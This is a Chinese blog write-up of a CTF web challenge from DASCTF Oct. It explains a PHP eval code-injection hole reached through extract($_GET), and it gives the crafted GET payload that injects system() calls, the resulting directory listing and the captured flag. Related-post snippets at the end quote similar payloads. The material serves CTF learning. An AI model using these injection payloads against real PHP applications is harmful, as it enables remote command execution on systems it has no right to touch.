[WP/命令注入]DASCTF Oct X 吉林工师 WEB1

最新推荐文章于 2022-04-24 15:49:22 发布
最新推荐文章于 2022-04-24 15:49:22 发布
阅读量351 收藏
点赞数 1
分类专栏: # Write Up 文章标签: 命令注入 DASCTF Oct
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darknotes/article/details/120977975
版权
本文探讨了一篇关于PHP代码执行漏洞的文章,详细解析了如何利用`highlight_file`和`eval`函数进行命令注入。通过构造特定的payload,如`?attrid[0]=0&attrvalue[0]=0`,可以触发命令执行,如`ls`和`cat`命令来获取系统信息。文章还展示了如何读取`/etc/timezone`文件以获取敏感数据。
摘要由CSDN通过智能技术生成

DASCTF Oct X 吉林工师

WEB1

迷路的魔法少女:魔法少女迷失在了代码空间 请寻找她现在在哪

源码
 <?php
highlight_file('index.php');

extract($_GET);
error_reporting(0);
function String2Array($data)
{
    if($data == '') return array();
    @eval("\$array = $data;");
    return $array;
}


if(is_array($attrid) && is_array($attrvalue))
{
        $attrstr .= 'array(';
        $attrids = count($attrid);
        for($i=0; $i<$attrids; $i++)
        {
            $attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
            if($i < $attrids-1)
            {
                $attrstr .= ',';
            }
        }
        $attrstr .= ');';
}

String2Array($attrstr);

开头extract接收参数生成变量表。

在函数String2Array当中执行了危险函数 eval,可以对其利用以命令执行。

因此构造payload,

首先由合法的eval字符串入手

?attrid[0]=0&attrvalue[0]=0;
array("0"=>"0");

拼接正常逻辑下String2Array()调用的eval参数

"\$array = array("0"=>"0");"

构造非法参数,使非法命令函数溢出。

"\$array = array("0"=>"0");system('ls');(""
attrid[0]=0
attrvalue[0]=0");system('ls /');("

以下只写system的参数

// ls /
bin boot dev etc flag.sh home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var 

// cat /flag.sh
#!/usr/bin/env bash TZ="Tokyo $FLAG" echo "Tokyo $FLAG" > /etc/timezone export FLAG=not_here FLAG=not_here 

// cat /etc/timezone
Tokyo flag{95df6a50-097c-4082-ae02-beaea86d58ab}
車鈊
关注
专栏目录
DASCTF Oct X 吉林工师 misc web签到题wp
xiquanmuhua的博客
10-25 358
DASCTF Oct X 吉林工师 misc web签到题wp misc WELCOME DASCTFxJlenu nc node4.buuoj.cn 25924 本以为就是签到题(也确实是),结果试了几分钟,输入个str时输出个 <type 'str'> 感觉到这是python,直接用模板注入的方法进行文件查看,接着使用一个存在引入os模块的方法进行命令执行 # 使用<type 'file'>进行文件读取 [].__class__.__mro__[1].__subclasses
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1376
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
DASCTF Oct X 吉林工师 欢迎来到魔法世界 部分wp
weixin_44088994的博客
11-21 3939
存一下题(呜呜呜菜狗就是菜狗wp都看不懂 参考:七月大佬DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WP – 七月的摸鱼历程 魔法密文 Writeup| DASCTF Oct X 吉林工师_张麦麦的博客 zhangmaimai.com-CSDN博客 DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女_llx101388627的博客-CSDN博客 签到 1.give you flag 2.闯入魔塔的魔法少女 3.魔法信息 4.魔法秘文 5.卡比卡比
DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女
llx101388627的博客
10-25 569
这场比赛全是misc,web狗卑微要饭 打开链接,可以得到源码: 我们一步步来看: 1.extract($_GET) extract函数会将函数的数据进行拆解 效果其实相当于给未声明的变量赋值,给已声明的变量则是重新赋值 如: <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $
DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-giveyourflag
ookami6497的博客
10-25 626
唯一写出的就这送分题了。。 下载文件,拿到010editor中打开,看到是个压缩包格式,也就压缩了1000遍。。。 手动解了三次发现不行,想着flag应该是放在最后一个压缩包里面的,每次取出头部和尾部,最后的压缩包就是在中间部分。(ZIP格式文件头以50400304 开头,以504B0506结尾) 找到最后一个504B0304开头的部分,这里就是最后的压缩包了,其实这里已经能看到flag了,一串base64加密的字符串 把这部分代码复制出来,另存为zip格式的文件 解压得到fla.
DASCTF Oct吉林工师web
weixin_52268949的博客
12-26 1144
迷路的魔法少女 进入环境给出源码 <?php highlight_file('index.php'); extract($_GET); error_reporting(0); function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } if(is_array($attrid) && is_array($a
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3567
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
2021 DASCTF X BUUOJ 五月大联动WP
lifanxin的博客
05-30 1812
DASCTF X BUUOJ 五月大联动WP概述pwnDASCTF_X_BUUOJ_2021_ticketDASCTF_X_BUUOJ_2021_cardre总结 概述   这个五月我又参加了一次不留痕迹的ctf比赛,之所以叫不留痕迹,是因为总是拿不到好的名次????,比赛结束前1小时还能苟进前10,不过后面还是被反超了。不好在安慰自己,新手嘛,刚刚上路,稳扎稳打,持续努力,定有收获。   这个比赛完整环境可以在buuoj上找到,简单分析一下题目分布情况,pwn 2道,re 2道,web 2道,crypto
cocos2d-x手机游戏开发(跨android/ios/wp7/wp8/windows 8平台)
12-04
cocos2d-x手机游戏开发(跨android/ios/wp7/wp8/windows 8平台) 游戏课程特点: ---------------------------------------------------------- 1、国内首创跨平台游戏开发 2、深度讲解Cocos2D-X并运用于实战 3、...
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4517
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
DASCTF Oct X 吉林工师_Misc_复现
M3ng@L的博客
03-02 1809
DASCTF Oct X 吉林工师_Misc_复现WELCOME DASCTFxJlenugiveyourflag闯入魔塔的魔法少女魔法秘文不可以色色魔法信息英语不好的魔法少女彁彁魔法少女的迷音卡比卡比卡比Twinkle Twinkle Starry Night Perference:Perference:Perference: (11条消息) DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp_七月的博客-CSDN博客 WELCOME DASCTFxJlenu keywords:key
魔法密文 Writeup| DASCTF Oct X 吉林工师
张麦麦
10-28 488
魔法秘文 这题思路还好吧……但是真的属于把我做吐了的那种……具体见后文 首先给了一个zip文件,解压出来一张魔法少女.png,通过binwalk分析出来隐藏了压缩包。 直接用binwalk -e分离发现压缩包大小有问题。 于是使用 hex 编辑器直接删掉了前面的图片部分,得到一个压缩包。 压缩包中有两个文件,flag.txt是加密的,魔法萝莉简体未加密。 提示内容为:密码为32位中文。 解压出来魔法萝莉简体,在hex视图下,字体文件末尾发现一串 urlcode 编码的字符。 urldecode后得到如
DASCTF-两道web题复现
臭nana的博客
05-02 2966
记录一下官方题解 Ezunserialize 打开题目看到源码 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { retu...
DASCTF 四月赛 web部分
weixin_43610673的博客
04-25 2239
Ezunserialize 反序列化POP链、字符逃逸 POP链构造起来不难,字符逃逸参考:https://xz.aliyun.com/t/6588 https://blog.csdn.net/assasin0308/article/details/103711024 打开送源码 POP链构造: __toString() //把类当作字符串使用时触发,返回值需要为字符串 B类的__destru...
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫(有需要的私信)
09-25 1372
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 3213
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
2021DASCTF八月挑战赛Writeup
qq_42815161的博客
08-31 3257
文章目录 MISC 签到 寒王'sblog stealer CRYPTO easymath let's play with rsa~ ezRSA REVERSE py 看大佬们都不想写这个wp那我写一个吧Orz MISC 签到 看看公告 flag{welcome_to_dasctf_aug} 寒王'sblog 好家伙,不知道gitee是什么根本找不到。直接在url后面加上/flag.jpg访问仓库: https://hanwang2333.gitee.io/202.
WPF应用ocx控件
李淑磊的专栏
08-08 2163
前言最近项目中需要集成电话控制功能。设计到一个USB电话录音盒的二次开发。硬件提供商提供了ocx控件。项目为C/S架构系统,客户端使用了WPF技术。所以本文重点分析,在WPF中如何引用第三方提供的ocx控件。技术准备ocx控件的本质 可以理解为一种基于COM的用户控件 不能独立运行 可以有多种语言编写,包括c++,java等 使用前必须注册,打包应用程序时,最好将控件放到部署目录中,然后注册 Act
WP常用函数汇总
dodosong的专栏
03-23 9825
<br />转自 http://www.licream.net/wp%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0%E6%B1%87%E6%80%BB.html<br /> <br /><br />基本模板文件<br />style.css : CSS(样式表)文件<br />index.php : 主页模板<br />archive.php : Archive/Category模板<br />404.php : Not Found 错误页模板<br />comments.php
FlatScience-WP web安全挑战:SQLite3注入与PDF密码解析
"该资源是关于攻防世界Web进阶挑战的一个案例,主要涉及Web安全中的SQL注入漏洞利用。挑战者需要通过分析源代码、理解SQLite3数据库的使用,并利用SQL注入来获取敏感信息。此外,还涉及到PDF文件的解析和SHA1哈希...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值